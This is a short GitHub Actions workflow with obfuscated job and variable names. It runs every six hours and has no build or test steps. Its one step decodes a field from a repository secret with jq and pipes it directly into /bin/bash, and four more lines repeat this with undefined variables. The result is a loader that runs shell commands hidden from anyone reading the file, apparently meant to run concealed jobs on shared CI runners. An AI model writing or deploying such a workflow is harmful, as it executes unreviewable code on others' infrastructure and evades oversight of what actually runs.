name: zhongxiaoyan3456

on:
  workflow_dispatch:
  schedule:
    - cron: '31 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhongxiaoyan3456
        env:
          ttsl06014: ${{ secrets.ttsl06014 }}
        run: |
          echo $ttsl06014 | jq -r .dy90 | /bin/bash
          echo $xf8 | jq -r .fjd37 | /bin/bash
          echo $xh1026 | jq -r .vtgir81 | /bin/bash
          echo $k947 | jq -r .o138 | /bin/bash
          echo $aq1244 | jq -r .gmry7 | /bin/bash

